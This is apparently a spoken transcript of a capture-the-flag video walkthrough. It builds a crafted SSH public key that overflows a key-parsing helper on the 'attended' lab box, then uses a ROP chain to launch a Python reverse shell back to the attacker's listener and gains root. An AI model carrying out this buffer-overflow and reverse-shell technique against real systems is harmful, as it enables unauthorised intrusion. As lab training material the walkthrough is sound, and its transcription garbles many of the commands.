RSA. And then, oh, A's here. So that's SSH RSA. Then we have 3 bytes, and it's going to be 10001. So that's E. And then we have 0181. So this is the length of N, which is the public key. And then it's going to do 00B9, which I don't understand what this piece is, but this is where the public key begins. But we have to add this. If we don't have this bit here, it will fail. So, yeah. Let's see, where was I? Am I editing here? Where's my script? Did I close out? I did close out. Okay. So that's why we have that. And this is going to be E. And then we want to add the length of N. So P32, I'm just going to call it 800 because, well, it's probably like 500 or something. I don't know if this value matters too much. It's probably 500 because we get to the overwrite around, oh, no. It would be 0x500, I think. Because we get to the overwrite around 300 hex. So, yeah. This is just adding it for a ROP chain after that. Is equal to big. And this is length of N. And then buff plus equals, we just hand jam the values. I think it was B8 in that example. We'll see if this is a valid public key. So let's see if this works. I think everything should go. So Python 3 buff.py, it prints, And it looks like our key does begin with this AAA. And if we cat this base64-d xxd less dash capital S, or not cat, echo-n. There we go. We begin with SSH RSA, then we do that, and when our key begins, we're putting junk. So this looks, I guess, good. And all these A's gets us to where we do the ROP chain. So let's see if this becomes a public key. So I'm going to copy the hex value, which is probably in my clipboard because of PyClippy, but oh well. I'll call this exploit.pub, and we just say sh-rsa and paste this in. And it's kind of funny because we tell that it's an SSH RSA key, but right here in this base64, it also says SSH RSA. I just find it funny it's defined twice. So let's just see if it is. If we sh-i with a public key, it still uses it. So freshness at 10.10.10. I'll just do it DNS 10.htb. And it's not going to let us in, but we do get invalid format. So our format is not good. The other thing I want to try doing real quick is increase this value to C8 V. And this was just like copying public keys of SSH and looking at that value. So let's do freshness v exploit.pub format. There we go. Paste this. Oh, I was like, it should have printed that out. Let's see if this works. Still getting invalid format. Why is this invalid? I'm guessing the length of n is wrong, and that's why. So let's see. V buff.py. It's actually going to make me calculate this. This is annoying. Let's see. Let's just go to the very end. Print len of buff. Python 3 buff.py 960. Let's try putting 960 here. So we should have this copied to the clipboard, but I'm going to do it for good measure. V exploit.pub, sh-rsa, paste, and run. Invalid format. So we screwed up our header somehow. Wonder if -v gives us anything. Let's see. It's trying a few. Let's call this exploit at parent. Do we have exploit? Invalid format. So you can see when I try to SSH, it is sending a bunch of public keys that I have just tied to me. And we can verify public keys won't give you that like error message if we chmod 600 freshness.pub sh-i freshness.pub and freshness at attended.htb. Wait. Organg. I didn't think I got invalid format before. I know when doing this, like yesterday, I was able to specify a public key with SSH. I wonder if that's a BSD-ism. Let's just copy the key to attended. So scp-i freshness exploit.pub2, what is it? attended.htb dev shm, and we have to specify the user. Permission denied. Let's just copy it to Freshness's home. sh-i freshness attended.htb, specify the user, and see if this works. So exploit.pub is there, chmod 600, exploit.pub. I think I was already SSH'd up there. That's funny. Let's kill the web server. We can do it here. Python 3 main.py sudo python 3 main.py. Okay. sh-i. Oh, the next piece of information that we haven't talked about is attended gateway. If you look at the host file, you see it here. And if you do a netcat zv on attended gateway on 22, it's not there. If you write it like a brute force script or something, you can find port 2222 is open via TCP. But we can sh-i exploit.pub root at attended GW, and we specify port 2222. I'm not sure if it's a capital P or lowercase p. Invalid format. Okay. So we got to fix up our SSH key. We'll do it in this pane. Exit. So let's go into buff.py. And I really think the issue is around these two lines. The length of the n, which is the key, and then whatever this second 2 bytes is. And I couldn't figure out exactly what this is. So let's just do the lazy approach and generate a large SSH key and copy the values. So -f, and we're going to call this big key -b 16384. So this should generate a giant RSA key, and it's going to take a little while to generate. So I'm going to pause the video for it to generate this, and we'll resume and then steal all the values. It's now finally asking for the passphrase. It took a few minutes to actually generate this key, but now we have bigkey.pub. So if I cat bigkey.pub, it is a big private key. If we cat my exploit.pub, it is much smaller. So we're probably going to want to make our exploit padded a little bit. So let's base64-d xxd less-s, and we can see the values. So it is 801 there, and it's doing EC. So let's change to 801 and EC. So let's go to buff.py. We're doing it in this pane. So 0x801 EC. And this probably won't work right off the bat because we'll have to do some L adjusting to get it to the correct size. So let's do this. v-exploit.pub. Paste it in, and sh-i exploit.pub freshness at attended.htb. Do I have that? Still invalid format. So let's go and L adjust our base64. So this buff, let's do buff is equal to buff.ladjust, and we want to say 0x801, I think it was, and it's not in quotes, and we put it with null bytes. There we go. So all this did is make our buffer 801 in hex length. So now if I python 3 buff.py, it is definitely bigger. It's filled with A's because those are all null bytes. But if we go back to exploit.pub and put this key in, what happens? Shoot. SH invalid format. So we are still wrong. Let's see. Buff.py. Is it 817? Do we have to like remove the bytes for the header? Let's try that. V exploit.pub. You can see how finicky this piece is. Invalid format. I wish I could figure out exactly why this is. We can go back to this pane. Cat exploit.pub. And we can... I wonder if we have to end with a line break. Like that? No, that can't be it. SSH invalid format. Okay. So that's not it. Cat exploit.pub. Let's echo-n base 64-d xxd less capital S. And we can do it with big key as well. And that is in here. So cat bigkey.pub echo-n paste base 64-d xxd less like this. Okay. So 0EC right here. And then this is where the key begins. So it's still 801 here. EC, let's see, 0007, 7373, 68D2, 7273, 610, all nulls, 0301, this is 01, null, 0801. So unless this piece is also part of the header, we have everything correct. Let's look at the total length. And my key is like 14 bytes shorter. Python, let's see, what key am I doing? Let's just redo this. So python 3 buff.py. And this is definitely my key. And we were catting exploit.pub, and that doesn't end in equals. So I think we edited the buff.py and didn't recopy it into the key. Oh man, it's like midnight. It's 11:45 p.m. by me. I think my time zone's wrong on my computer. But yeah, it's late. Make mistakes. Intended.htb. This is going to be invalid formatted again. I don't know what's going to go on. Actually, no, it worked. So we don't have any error message. So we've successfully created that public key. So we can go to whatever pane we're SSH'd in. Here we are. V exploit.pub. And we're going to put a new key. And we can sh-i exploit.pub 222 root, and it did not ask for, or it did not say invalid format. If I do who am I, it still did not work. Who am I? I did not expect this to happen. Let's see. Sudo grep-i IPTables varlog messages. So 358.47 is the last one, like an hour ago. So it definitely did not attempt to connect back. which is not great. Let's see. What if it doesn't have like one of the libraries in that rev shell? So we can change the shell out with a more simple one. So let's go into buff.py, and where our Python code is, the shell, let's change this. So we tested this did work. I don't know why this would not work suddenly, but we can reverse shell cheat sheet pen test monkey. If one rev shell doesn't work, always try the next. Python, so we can do this. And shell is equal to B, paste this. And we want to replace IP address with 10.10.14.2. 10.10.14.2. We'll say port 80. Okay. So now we have a reverse shell on port 80. Sudo nc lvnp 80. Python 3 buff.py. Copy that to my clipboard. Exploit.pub. Paste. And we can attempt to SSH in. Nothing. I'm going to try on 443. Is this a firewall rule? I'll be so upset if it is. Let's see. Search for 80. 443. V exploit.pub. Paste. Four, 4, 3. That SA session died. I wonder if the server's reverting. That would really suck. sh-i freshness at 10 attended.htb. Ping 10.10.14.1. My VPN died. Okay, we're back up. And the exploit is not working. So what I'm going to do is we're going to edit this and we're going to try this SSH key. Maybe like adding this SSH header screwed up alignment somewhere. So I'm going to see if we can fix that quickly. Config, and we want to set to this IP. Come on, there we go. Set here, 443 is fine. So Python 3, buff.py. We want to grab this. And let's see, sh-i. What was the key we used to go into our VM? Oh, VM. Root at 192.168. Let's see, -i VM. Sweet. Okay. So AuthKeys 1, 2, 3. Paste this. And we get a segfault. So it looks like when we added the header, we screwed something up. I wish I checked for that like a while ago. So EGDB, AuthKeys. We probably should do /AuthKeys. I don't know if it matters. Or 1, 2, 3. Paste. Let's see. Where do we error? Do we have export? I was hoping I could get that error message out. Forget what it was. Oh well. GDB AuthKeys. Let's go to IDA. Let's break on our base 64 where we return. This is 436B. B stir 0x436B. Run. We broke on the return. So let's now see if we make it all the way to our syscall. So our syscall, let's go into buff.py. Oh, I think we're segfaulting because we're using Python 2. I didn't edit this to be Python 3. Python 3. See. So now we're on syscall. And we can look at our stack. RAX is 3B, that's 59, that's what we wanted. RSI is pointed to these three arguments, and RDI is pointed to this. So I think this is exactly what we want. We just segfault because we don't have Python 3 or Python 2. So let's edit buff, Python 3, that's already there, Python 3 buff.py. Grab this code. 1, 2, 3, paste, and see. Oh. Let's see. There we go. / AuthKeys 1, 2, 3, paste. I don't know why it still thinks I'm in GDB. Unable to decode the command from the command line. 1, 2, 3, 4. What? Let's do egdb AuthKeys. Run 1, 2, 3, paste. We should break on that return. Run it again. So we got, this is RAX. And then the next return we have is RDI, RDX, Syscall. Let's see, doing a syscall, 59. This string, user local bin Python 3. So that is correct. And then RSI. Was it XG? D8. So this is going to be Python. This is going to be -C. And this is going to be a reverse shell. That's all correct. And we still segfault. Is the reverse shellcode bad? Cat. We can just grab it here. buff.py less so we can grab this. User local bin python 3 -c. Reverse shellcode is fine. There's got to be something stupid I'm missing. 1, 2, 3. Python 3 buff.py. Paste. I really don't know why it's getting this unable to decode command from command line. Let's just try that export command again. lc ctype is equal to c utf-8 and see if that gets rid of this error. It doesn't. Surrogates not allowed. I can echo that just fine. If I copy AuthKeys 1, 2, 3, paste. See, I got rid of the equals, and that doesn't do it. Let's get rid of that ljust. That's like the only thing I can think we've really changed. So buff.py, we can get rid of ljust, which is going to shrink it. AuthKeys 1, 2, 3, paste, nc lvmp 443, and no. Let's see. Going to clear everything, and we're just going to start from scratch. Well, not start the exploit again, but start our thought process again, because I am baffled. Okay, let's get this error message again, and I'm going to Google what this is. So let's go Firefox, put this in quotes, go to the next thing. What is that? Let's see, Android Python. It's looking like it's all Python. So let's go back to the reverse shell code, because it seems like we introduced it when we created the reverse shell. Oh, that's probably like 15 minutes of your time wasted because I forgot to pull a null byte there. I bet we can do this ljusting thing again. Probably should not change two things at once, but I'm confident it was that null byte. 1, 2, 3, 4. Connection refused. nc lvmp 443. Sudo. Okay. So that works. So we can edit puff.py, python 3, change this back to 2 because that's what's running on the box. And we can change this to be 1010. So 1010 14.2 port 80. Python 3 buff.py sudo nc lvmp 80. And we go to this attended, which is the VM name. Horrible naming convention name both my test VM and target as the same thing. Hindsight's 2020. So sh-i pub on this, and it works. I'm not sure what we had wrong with anything at this point, but if we go to root, we can get root.txt. I want to just try this real quick. If we get rid of shell, there and put this shell, is it literally like my reverse shell that's breaking? Was that the thing? Sudo nc lvnp like that. Hold on. We have to python 3 buff.py to copy it. V exploit.pub. Put the new one in. -I. Yeah, it doesn't like my fancy web cradle, but has no problem with the reverse shell. So not sure exactly what's going on with my fancy web cradle. We may be able to test this out. Wonder if we can have 2 ports. I wonder if the gateway can get out on port 80. Seems to have less firewall restrictions. So let's go 10.10.14.2. I mean, not 80. 4.4.3. So python 3 buff.py sudo nc lvnp 4.4.3 exploit.pub. Okay, so we can get here. So what I want to do is run the Python one-liner. So if we cat buff.py, go all the way up, and run this command. I wonder if it's because we don't have like a semicolon or something silly. Hasn't affected us before though, so Python 2. Paste, oh god. Okay. Python 2-c did not like that copy. Okay. B64. Okay. Let's copy this. Python 2-c paste sudo nc lvnp 80. No module named requests. So that's where we were getting screwed up. We wasted probably 20 minutes, I would say, because the gateway doesn't have the request module. So that's why my fancy web cradle did not work. But when we switched to reverse shells, it did. It's an annoying thing about Python and troubleshooting like exploits like this. Never know exactly what the target is. But hope you guys enjoyed that. Take care, and I will see you all next week.